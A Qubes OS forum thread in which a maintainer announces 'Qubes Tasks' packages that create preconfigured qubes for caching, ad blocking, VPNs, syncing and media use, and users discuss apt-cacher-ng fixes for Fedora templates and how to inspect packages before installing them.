Tool: Simple Set-up of New Qubes and Software

cool work, as a new linux user the biggest hurdle by far is all the terminal work. Luckily i already have a foundation under me of HTML/CSS etc. so using script and learning it isnt an automatic mind fk. However for most people it will be, the biggest hurdle to get a lot more people on linux is making ALL the normal day to day functions people may want to do easily done through a GUI. I know the linux community likely isn’t as focused on that as using terminal etc. is part of the networking/management fun of linux. Hopefully one day linux will be the gamer OS of choice (thanks for steam and proton that reality is coming faster than it was) but even steam OS takes more than a lot of normal people are willing to invest into an OS even just for games. Forums are full of people who switched to windows devices because they “couldnt figure it out” and thats only a small handfull of stuff to learn in a very niche use case. When it comes to a full everyday use linux OS the amount of stuff is quite daunting. I’m not sure if a full GUI OS would be something that would be suitable for Qubes or not as i don’t know how much vulnerability is added by all the extra code/modifications for the interfaces and how it would effect the attack surface but it sure would be nice!

@unman any status on this for our QubesOS users?

I haven’t announced it yet, but the repo for 4.2 is well populated
already. Perhaps this is the announcement.
I’ll post something more detailed once I’ve finished the Mullvad


Great work as always, @unman
I’m working out of the new 4.2 repo and all debian-based templates work when using the cacher salt configs.

Fedora templates, however, issue Curl errors (5), (500), and (56). I think somewhere I read you suggested changing the repository metalinks or alternating to the baseurls instead? I can’t find the source of that post now.


Found this in an old email list exchange, for anyone looking to troubleshoot apt-cacher-ng:

Yes, apt-cacher-ng works for Fedora updates.

You have to make some changes -
First, on the client side, comment out “metalink” lines, and uncomment
“baseurl” lines. This is because the metalink will keep loading new
https:// repositories, and apt-cacher-ng cant cache those requests,
as you know.
Second, watch the caches in /var/cache/apt-cacher-ng , and add any new
ones to the fedora_mirrors file - this is because that file doesn’t
contain all Fedora repositories.

After a while you will have almost all your Fedora updates cached, and
will see the speed increase.

I’m finally announcing that tasks are available for 4.2.
You can read details here

These are packages that you can install which will create and configure
templates and qubes for specific purposes. All are based on debian-12
templates, usually the minimal template.

There’s a CLI and the same ugly GUI. I recommend running the GUI because
these tools are supposed to take away the reliance on command line use
in dom0. (It also has the advantage of giving some feedback while the
templates are installed and configured.)

What’s here?

Among the task packages so far:

  • cacher - a caching proxy. If you clone a template this will cache the downloaded packages on updates, to reduce the bandwidth/time pain of having multiple templates trying to grab the same packages.
  • pihole - installs and configures a pihole qube, which helps to block advertisements and internet trackers
  • syncthing - a syncthing qube, and a syncthing service. You can syncthing files between qubes and/or use syncthing with external machines.
  • multimedia - creates a media qube which is intended to store media files, and an associated disposable multimedia qube to play the files. So you can (relatively) safely download stuff and store it in media, while viewing or using in the disposable.
  • Mullvad - thanks to the good folk at Mullvad, creates a sys-mullvad qube where you can configure the VPN for use in attached qubes. Also creates a disposable template so you can use disposables with the Mullvad browser, and/or use a VPN just in that disposable.
  • Proton VPN - a qube to use Proton VPN
  • sys-vpn - a service qube to help configure an OpenVPN connection for use by attached qubes.
  • reader - creates a template with software aimed at terminal users, like conversion to plain text, edbrowse, and orca.
  • mirage-firewall - installs the latest release of the unikernel mirage firewall, warts and all.
  • split-git
  • split-gpg


The source is on GitHub.
For the most part these packages install and run salt states. The states are deliberately simple to read so almost any one will be able to understand what they do.

Why should I trust this?

Dont. At least, not without some careful thought.
All the packages are signed with my Qubes signing key.
All the code is available, and any one can review it.

If you want to check what a particular package really does.

  1. Download the package without installing it.
  2. rpm2cpio PACKAGE_NAME |cpio -id will extract the directories and files from the package, so you can inspect them.
  3. rpm -qi --scripts PACKAGE_NAME will show you exactly what scripts will be run on installation.

Suggestions, changes, or improvements?

Post in this thread with suggestions for new packages or changes to the existing ones.
Most of these packages have been created to other user specifications.


Please dont post them here.
Open a new thread with details of the problem. It’s easier to see the problem, and other users will be able to find the problem, and (I hope), the answer, more easily.

If the formatting here is off, can someone fix it for me?



Should have included obligatory sig.

Wishing now that your Qubes Tasks could somehow merge with qusal

After all the conversations on backing up one’s system, I’ve finally understood the necessity of salting all my qubes. Qubes Tasks is a great step toward understanding that.

1 Like